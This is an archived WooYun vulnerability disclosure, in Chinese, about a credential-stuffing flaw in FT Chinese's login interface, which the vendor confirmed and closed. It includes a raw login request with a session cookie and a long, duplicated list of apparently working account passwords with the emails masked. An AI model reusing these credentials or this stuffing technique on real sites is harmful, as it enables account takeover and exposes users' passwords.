当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0144140

漏洞标题: FT中文网主站接口设计不当可导致撞库攻击(严重泄漏用户敏感信息)

相关厂商:FT中文网

漏洞作者: 路人甲

提交时间:2015-09-29 22:10

修复时间:2015-11-09 10:55

公开时间:2015-11-09 10:55

漏洞类型:设计缺陷/逻辑错误

危害等级:低

自评Rank:3

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-09-29: 细节已通知厂商并且等待厂商处理中
2015-09-30: 厂商已经确认,细节仅向厂商公开
2015-10-10: 细节向核心白帽子及相关领域专家公开
2015-10-20: 细节向普通白帽子公开
2015-10-30: 细节向实习白帽子公开
2015-11-09: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

FT中文网主站接口设计不当可导致撞库攻击(严重泄漏用户敏感信息)

详细说明:

FT中文网主站登陆接口:http://user.ftchinese.com/login
因为登陆位置没有做出任何登陆限制,抓包查看用户名和密码又是明文传输,所以可以导致撞库攻击:

POST /login HTTP/1.1
Host: user.ftchinese.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://user.ftchinese.com/login
Cookie: _ga=GA1.3.214002032.1443503033; gourl=http%3A%2F%2Fwww.ftchinese.com%2F; PHPSESSID=u812ipbdb5e0s78dv4o6nt2gj3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
username=123123123@qq%2ecom&password=123123&saveme=on&gourl=http%3A%2F%2Fuser.ftchinese.com%2Flogin


[email protected]	188571	971
[email protected]	6025210	974
[email protected]	102734	975
[email protected]	1982529	976
[email protected]	7618978	976
[email protected]	111111	977
[email protected]	123456	978
[email protected]	32689852	978
[email protected]	851024	978
[email protected]	mikeisgood	979
[email protected]	skymaster	979
[email protected]	123456	980
[email protected]	51877018	981
[email protected]	19840716	982
[email protected]	15968707181	982
[email protected]	123456	982
[email protected]	870923	993
[email protected]	i4e4x5a3	994
[email protected]	zhuxuanans	994
[email protected]	123456	995
[email protected]	123456	995
[email protected]	123456	995
[email protected]	123456	995
[email protected]	123456	997
[email protected]	123456	997
[email protected]	b299782t	997
[email protected]	852404509	1007
[email protected]	wsawsdws	1008
[email protected]	963277	1010
[email protected]	1307636720	1010
[email protected]	6223568	1012
[email protected]	yuanye	1012
[email protected]	454563	1013
[email protected]	123456	1013
[email protected]	54088d11	1013
[email protected]	lefthand	1014
[email protected]	3624029	1014
[email protected]	dxb222	1015
[email protected]	99265839	1016
[email protected]	c1991718	1017
[email protected]	52501995	1019
[email protected]	zxkzxk	1020
[email protected]	321610	1023
[email protected]	123456	1025
[email protected]	123456	1025
[email protected]	636209166	1025
[email protected]	password	1026
[email protected]	4210026a	1026
[email protected]	zhendeaini	1026
[email protected]	880526	1026
[email protected]	55326961	1027
[email protected]	881019	1027
[email protected]	950902	1027
[email protected]	cmbjx1995	1027
[email protected]	123123	1028
[email protected]	a3540338	1028
[email protected]	mayang	1029
[email protected]	27057663	1029
[email protected]	19621021	1029
[email protected]	4369297	1030
[email protected]	123123	1030
[email protected]	5zmqamjg	1030
[email protected]	19911013	1030
[email protected]	123123	1030
[email protected]	snoopylmh	1030
[email protected]	86015949	1030
[email protected]	3381445	1031
[email protected]	123123	1032
[email protected]	7660213	1032
[email protected]	111111	1032
[email protected]	111111	1032
[email protected]	111111	1032
[email protected]	85190453	1032
[email protected]	123123	1032
[email protected]	static	1032
[email protected]	131421	1032
[email protected]	123456	1032
[email protected]	7660213	1032
[email protected]	3653350	1032
[email protected]	mfkcatq	1033
[email protected]	tw123456789	1034
[email protected]	111111	1034
[email protected]	123456	1034
[email protected]	900218	1034
[email protected]	w5722u	1034
[email protected]	880714	1034
[email protected]	8846887	1034
[email protected]	521665	1034
[email protected]	350958532	1034
[email protected]	1990920	1034
[email protected]	bailou199012	1035
[email protected]	111111	1036
[email protected]	77478012	1036
[email protected]	0.123654	1036
[email protected]	123321	1036
[email protected]	9203317115	1036
[email protected]	5201314	1036
[email protected]	123123	1036
[email protected]	woaini1122	1036
[email protected]	7319098	1036
[email protected]	880807	1036
[email protected]	132921088	1036
[email protected]	27463722	1036
[email protected]	23230078	1037
[email protected]	sarah526	1037
[email protected]	72160317	1038
[email protected]	123456	1039
[email protected]	19732846	1041
[email protected]	wenjie143	1043
[email protected]	110110	1046
[email protected]	6322098	1046
[email protected]	139a1300	1049
[email protected]	8703631	1049
[email protected]	8267638	1057
[email protected]	789456	1061
[email protected]	870423	1061
[email protected]	zxzl19860428	1065
[email protected]	wuya0751	1067
[email protected]	123456	1067
[email protected]	422307	1069
[email protected]	871128	1069
[email protected]	123456	1071
[email protected]	woaini	1072
[email protected]	123456	1072
[email protected]	111111	1072
[email protected]	984331	1072
[email protected]	cx7773046	1072
[email protected]	1314521ding	1073
[email protected]	63476369	1073
[email protected]	100200	1073
[email protected]	456852	1073
[email protected]	19900420	1073
[email protected]	8777557	1073
[email protected]	woainiya	1074
[email protected]	wlc123	1074
[email protected]	335544	1074
[email protected]	nwcpadme	1074
[email protected]	123456	1074
[email protected]	3951435	1074
[email protected]	sconiel	1074
[email protected]	duandian	1074
[email protected]	stamina	1074
[email protected]	123456a	1074
[email protected]	321654	1075
[email protected]	fengtao71	1075
[email protected]	811121	1075
[email protected]	123456	1075
[email protected]	13949825568	1075
[email protected]	jeremyok	1075
[email protected]	854111	1076
[email protected]	shenjun	1076
[email protected]	22336495	1077
[email protected]	963852	1077
[email protected]	56094256	1077
[email protected]	88aa88aa88	1077
[email protected]	13895772542	1078
[email protected]	3105955	1078
[email protected]	yanjingwen	1078
[email protected]	xy19880518	1078
[email protected]	775600	1078
[email protected]	hgb1991821	1079
[email protected]	yh843100	1079
[email protected]	hwlajj	1079
[email protected]	14541454	1080
[email protected]	333333	1080
[email protected]	3628814	1080
[email protected]	lh8123456	1083
[email protected]	159654	1083
[email protected]	159654	1083
[email protected]	19880208	1087
[email protected]	lovely123304	1088
[email protected]	701022	1088
[email protected]	86653470	1088
[email protected]	516618	1089
[email protected]	200712	1090
[email protected]	305182965	1090
[email protected]	zny5951454	1091
[email protected]	8888888	1091
[email protected]	5350199a	1092
[email protected]	jiang871027	1093
[email protected]	1382500	1094
[email protected]	15501760	1094
[email protected]	111111	1094
[email protected]	111111	1094
[email protected]	19811114	1096
[email protected]	271828	1096
[email protected]	2687264	1096
[email protected]	haozheng668	1098
[email protected]	19861024	1103
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	19920831	1104
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	19890307	1104
[email protected]	123456	1104
[email protected]	philips15a	1107
[email protected]	12051205	1107
[email protected]	8970290	1107
[email protected]	989010	1109
[email protected]	wodwodwod	1109
[email protected]	yuanyeyy	1109
[email protected]	123456	1110
[email protected]	daylay	1111
[email protected]	iloveyou	1111
[email protected]	379886571	1111
[email protected]	771229	1111
[email protected]	111	1111
[email protected]	610428	1112
[email protected]	901013	1113
[email protected]	920305	1113
[email protected]	1456721737	1113
[email protected]	19870103	1114
[email protected]	fb18288	1114
[email protected]	88888888	1115
[email protected]	sy3312876	1117
[email protected]	badmescal	1121
[email protected]	8228216	1121
[email protected]	19911215zlt	1123
[email protected]	64221272	1123
[email protected]	198622700	1124
[email protected]	50427344	1124
[email protected]	31881699	1124
[email protected]	mzl132612	1125
[email protected]	830111	1125
[email protected]	15009908417	1125
[email protected]	liyue123456	1125
[email protected]	wrdwhdrdm	1125
[email protected]	860411	1125
[email protected]	123456	1126
[email protected]	110140	1126
[email protected]	wh16435287	1126
[email protected]	4815887	1126
[email protected]	50199763	1126
[email protected]	24486229	1126
[email protected]	123456789	1126
[email protected]	185961234	1127
[email protected]	584421048	1127
[email protected]	674959	1127
[email protected]	quickbasic	1127
[email protected]	5201314	1127
[email protected]	275071874	1128
[email protected]	8510099	1128
[email protected]	198812zx	1128
[email protected]	900310	1128
[email protected]	1986092	1128
[email protected]	fimergo	1128
[email protected]	3588706	1128
[email protected]	33775323	1128
[email protected]	5167998	1128
[email protected]	65189180	1129
[email protected]	123456	1129
[email protected]	qwe123qwe123	1129
[email protected]	fancy639	1129
[email protected]	haitian1983	1130
[email protected]	2007310	1130
[email protected]	heartless	1130
[email protected]	887900	1131
[email protected]	890623	1131
[email protected]	441700	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	ck7812396	1131
[email protected]	441700	1131
[email protected]	12332145	1132
[email protected]	753951	1132
[email protected]	xiaojienb	1132
[email protected]	111111	1132
[email protected]	15959208478	1132
[email protected]	gwf870716	1132
[email protected]	632177788	1132
[email protected]	shengxia	1133
[email protected]	cmsj1989	1133
[email protected]	839200	1133
[email protected]	iloveyou	1133
[email protected]	54952877	1133
[email protected]	986753421	1133
[email protected]	zyj543210	1133
[email protected]	zyj543210	1133
[email protected]	eyesonme	1133
[email protected]	as1991520	1134
[email protected]	daviddai1992	1134
[email protected]	2124869	1134
[email protected]	mx2033603	1134
[email protected]	momo5225	1134
[email protected]	8961183	1134
[email protected]	shukuang	1134
[email protected]	13602359761	1135
[email protected]	22441111	1135
[email protected]	changchun	1135
[email protected]	9831102	1136
[email protected]	7800459	1136
[email protected]	19931022anne	1136
[email protected]	780612	1136
[email protected]	2663232	1136
[email protected]	503697818	1136
[email protected]	415230	1136
[email protected]	yy211314	1137
[email protected]	262053178	1138
[email protected]	2287324	1138
[email protected]	69221462	1138
[email protected]	265900	1138
[email protected]	555555	1138
[email protected]	3503556	1138
[email protected]	86618240	1140
[email protected]	qq123456	1140
[email protected]	2008211043	1142
[email protected]	408335784	1144
[email protected]	199132	1146
[email protected]	nakashima7	1148
[email protected]	li19891220	1150
[email protected]	820523	1152
[email protected]	7221213	1157
[email protected]	312105329	1157
[email protected]
2.png



	19850615	1158
[email protected]	bpf815925	1159
[email protected]	13630850885	1159
[email protected]	kissme	1192


登陆后发现严重泄漏用户敏感信息:

1.png


2.png


3.png

漏洞证明:

FT中文网主站登陆接口:http://user.ftchinese.com/login
因为登陆位置没有做出任何登陆限制,抓包查看用户名和密码又是明文传输,所以可以导致撞库攻击:

POST /login HTTP/1.1
Host: user.ftchinese.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://user.ftchinese.com/login
Cookie: _ga=GA1.3.214002032.1443503033; gourl=http%3A%2F%2Fwww.ftchinese.com%2F; PHPSESSID=u812ipbdb5e0s78dv4o6nt2gj3
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
username=123123123@qq%2ecom&password=123123&saveme=on&gourl=http%3A%2F%2Fuser.ftchinese.com%2Flogin


[email protected]	188571	971
[email protected]	6025210	974
[email protected]	102734	975
[email protected]	1982529	976
[email protected]	7618978	976
[email protected]	111111	977
[email protected]	123456	978
[email protected]	32689852	978
[email protected]	851024	978
[email protected]	mikeisgood	979
[email protected]	skymaster	979
[email protected]	123456	980
[email protected]	51877018	981
[email protected]	19840716	982
[email protected]	15968707181	982
[email protected]	123456	982
[email protected]	870923	993
[email protected]	i4e4x5a3	994
[email protected]	zhuxuanans	994
[email protected]	123456	995
[email protected]	123456	995
[email protected]	123456	995
[email protected]	123456	995
[email protected]	123456	997
[email protected]	123456	997
[email protected]	b299782t	997
[email protected]	852404509	1007
[email protected]	wsawsdws	1008
[email protected]	963277	1010
[email protected]	1307636720	1010
[email protected]	6223568	1012
[email protected]	yuanye	1012
[email protected]	454563	1013
[email protected]	123456	1013
[email protected]	54088d11	1013
[email protected]	lefthand	1014
[email protected]	3624029	1014
[email protected]	dxb222	1015
[email protected]	99265839	1016
[email protected]	c1991718	1017
[email protected]	52501995	1019
[email protected]	zxkzxk	1020
[email protected]	321610	1023
[email protected]	123456	1025
[email protected]	123456	1025
[email protected]	636209166	1025
[email protected]	password	1026
[email protected]	4210026a	1026
[email protected]	zhendeaini	1026
[email protected]	880526	1026
[email protected]	55326961	1027
[email protected]	881019	1027
[email protected]	950902	1027
[email protected]	cmbjx1995	1027
[email protected]	123123	1028
[email protected]	a3540338	1028
[email protected]	mayang	1029
[email protected]	27057663	1029
[email protected]	19621021	1029
[email protected]	4369297	1030
[email protected]	123123	1030
[email protected]	5zmqamjg	1030
[email protected]	19911013	1030
[email protected]	123123	1030
[email protected]	snoopylmh	1030
[email protected]	86015949	1030
[email protected]	3381445	1031
[email protected]	123123	1032
[email protected]	7660213	1032
[email protected]	111111	1032
[email protected]	111111	1032
[email protected]	111111	1032
[email protected]	85190453	1032
[email protected]	123123	1032
[email protected]	static	1032
[email protected]	131421	1032
[email protected]	123456	1032
[email protected]	7660213	1032
[email protected]	3653350	1032
[email protected]	mfkcatq	1033
[email protected]	tw123456789	1034
[email protected]	111111	1034
[email protected]	123456	1034
[email protected]	900218	1034
[email protected]	w5722u	1034
[email protected]	880714	1034
[email protected]	8846887	1034
[email protected]	521665	1034
[email protected]	350958532	1034
[email protected]	1990920	1034
[email protected]	bailou199012	1035
[email protected]	111111	1036
[email protected]	77478012	1036
[email protected]	0.123654	1036
[email protected]	123321	1036
[email protected]	9203317115	1036
[email protected]	5201314	1036
[email protected]	123123	1036
[email protected]	woaini1122	1036
[email protected]	7319098	1036
[email protected]	880807	1036
[email protected]	132921088	1036
[email protected]	27463722	1036
[email protected]	23230078	1037
[email protected]	sarah526	1037
[email protected]	72160317	1038
[email protected]	123456	1039
[email protected]	19732846	1041
[email protected]	wenjie143	1043
[email protected]	110110	1046
[email protected]	6322098	1046
[email protected]	139a1300	1049
[email protected]	8703631	1049
[email protected]	8267638	1057
[email protected]	789456	1061
[email protected]	870423	1061
[email protected]	zxzl19860428	1065
[email protected]	wuya0751	1067
[email protected]	123456	1067
[email protected]	422307	1069
[email protected]	871128	1069
[email protected]	123456	1071
[email protected]	woaini	1072
[email protected]	123456	1072
[email protected]	111111	1072
[email protected]	984331	1072
[email protected]	cx7773046	1072
[email protected]	1314521ding	1073
[email protected]	63476369	1073
[email protected]	100200	1073
[email protected]	456852	1073
[email protected]	19900420	1073
[email protected]	8777557	1073
[email protected]	woainiya	1074
[email protected]	wlc123	1074
[email protected]	335544	1074
[email protected]	nwcpadme	1074
[email protected]	123456	1074
[email protected]	3951435	1074
[email protected]	sconiel	1074
[email protected]	duandian	1074
[email protected]	stamina	1074
[email protected]	123456a	1074
[email protected]	321654	1075
[email protected]	fengtao71	1075
[email protected]	811121	1075
[email protected]	123456	1075
[email protected]	13949825568	1075
[email protected]	jeremyok	1075
[email protected]	854111	1076
[email protected]	shenjun	1076
[email protected]	22336495	1077
[email protected]	963852	1077
[email protected]	56094256	1077
[email protected]	88aa88aa88	1077
[email protected]	13895772542	1078
[email protected]	3105955	1078
[email protected]	yanjingwen	1078
[email protected]	xy19880518	1078
[email protected]	775600	1078
[email protected]	hgb1991821	1079
[email protected]	yh843100	1079
[email protected]	hwlajj	1079
[email protected]	14541454	1080
[email protected]	333333	1080
[email protected]	3628814	1080
[email protected]	lh8123456	1083
[email protected]	159654	1083
[email protected]	159654	1083
[email protected]	19880208	1087
[email protected]	lovely123304	1088
[email protected]	701022	1088
[email protected]	86653470	1088
[email protected]	516618	1089
[email protected]	200712	1090
[email protected]	305182965	1090
[email protected]	zny5951454	1091
[email protected]	8888888	1091
[email protected]	5350199a	1092
[email protected]	jiang871027	1093
[email protected]	1382500	1094
[email protected]	15501760	1094
[email protected]	111111	1094
[email protected]	111111	1094
[email protected]	19811114	1096
[email protected]	271828	1096
[email protected]	2687264	1096
[email protected]	haozheng668	1098
[email protected]	19861024	1103
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	19920831	1104
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	123456	1104
[email protected]	19890307	1104
[email protected]	123456	1104
[email protected]	philips15a	1107
[email protected]	12051205	1107
[email protected]	8970290	1107
[email protected]	989010	1109
[email protected]	wodwodwod	1109
[email protected]	yuanyeyy	1109
[email protected]	123456	1110
[email protected]	daylay	1111
[email protected]	iloveyou	1111
[email protected]	379886571	1111
[email protected]	771229	1111
[email protected]	111	1111
[email protected]	610428	1112
[email protected]	901013	1113
[email protected]	920305	1113
[email protected]	1456721737	1113
[email protected]	19870103	1114
[email protected]	fb18288	1114
[email protected]	88888888	1115
[email protected]	sy3312876	1117
[email protected]	badmescal	1121
[email protected]	8228216	1121
[email protected]	19911215zlt	1123
[email protected]	64221272	1123
[email protected]	198622700	1124
[email protected]	50427344	1124
[email protected]	31881699	1124
[email protected]	mzl132612	1125
[email protected]	830111	1125
[email protected]	15009908417	1125
[email protected]	liyue123456	1125
[email protected]	wrdwhdrdm	1125
[email protected]	860411	1125
[email protected]	123456	1126
[email protected]	110140	1126
[email protected]	wh16435287	1126
[email protected]	4815887	1126
[email protected]	50199763	1126
[email protected]	24486229	1126
[email protected]	123456789	1126
[email protected]	185961234	1127
[email protected]	584421048	1127
[email protected]	674959	1127
[email protected]	quickbasic	1127
[email protected]	5201314	1127
[email protected]	275071874	1128
[email protected]	8510099	1128
[email protected]	198812zx	1128
[email protected]	900310	1128
[email protected]	1986092	1128
[email protected]	fimergo	1128
[email protected]	3588706	1128
[email protected]	33775323	1128
[email protected]	5167998	1128
[email protected]	65189180	1129
[email protected]	123456	1129
[email protected]	qwe123qwe123	1129
[email protected]	fancy639	1129
[email protected]	haitian1983	1130
[email protected]	2007310	1130
[email protected]	heartless	1130
[email protected]	887900	1131
[email protected]	890623	1131
[email protected]	441700	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	zyj543210	1131
[email protected]	ck7812396	1131
[email protected]	441700	1131
[email protected]	12332145	1132
[email protected]	753951	1132
[email protected]	xiaojienb	1132
[email protected]	111111	1132
[email protected]	15959208478	1132
[email protected]	gwf870716	1132
[email protected]	632177788	1132
[email protected]	shengxia	1133
[email protected]	cmsj1989	1133
[email protected]	839200	1133
[email protected]	iloveyou	1133
[email protected]	54952877	1133
[email protected]	986753421	1133
[email protected]	zyj543210	1133
[email protected]	zyj543210	1133
[email protected]	eyesonme	1133
[email protected]	as1991520	1134
[email protected]	daviddai1992	1134
[email protected]	2124869	1134
[email protected]	mx2033603	1134
[email protected]	momo5225	1134
[email protected]	8961183	1134
[email protected]	shukuang	1134
[email protected]	13602359761	1135
[email protected]	22441111	1135
[email protected]	changchun	1135
[email protected]	9831102	1136
[email protected]	7800459	1136
[email protected]	19931022anne	1136
[email protected]	780612	1136
[email protected]	2663232	1136
[email protected]	503697818	1136
[email protected]	415230	1136
[email protected]	yy211314	1137
[email protected]	262053178	1138
[email protected]	2287324	1138
[email protected]	69221462	1138
[email protected]	265900	1138
[email protected]	555555	1138
[email protected]	3503556	1138
[email protected]	86618240	1140
[email protected]	qq123456	1140
[email protected]	2008211043	1142
[email protected]	408335784	1144
[email protected]	199132	1146
[email protected]	nakashima7	1148
[email protected]	li19891220	1150
[email protected]	820523	1152
[email protected]	7221213	1157
[email protected]	312105329	1157
[email protected]
2.png



	19850615	1158
[email protected]	bpf815925	1159
[email protected]	13630850885	1159
[email protected]	kissme	1192


登陆后发现严重泄漏用户敏感信息:

1.png


2.png


3.png

修复方案:

验证码

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2015-09-30 11:24

厂商回复:

一个旧的登录接口本应该在2013年就作废的,但程序更新过程中没有更新到线上,所以存在一种可能导致这个旧的接口可以被访问到。这个接口的验证机制有漏洞,导致被扫库。非常感谢!

最新状态:

2015-11-09:该接口其实已经不在用了,现在已经关闭该功能函数。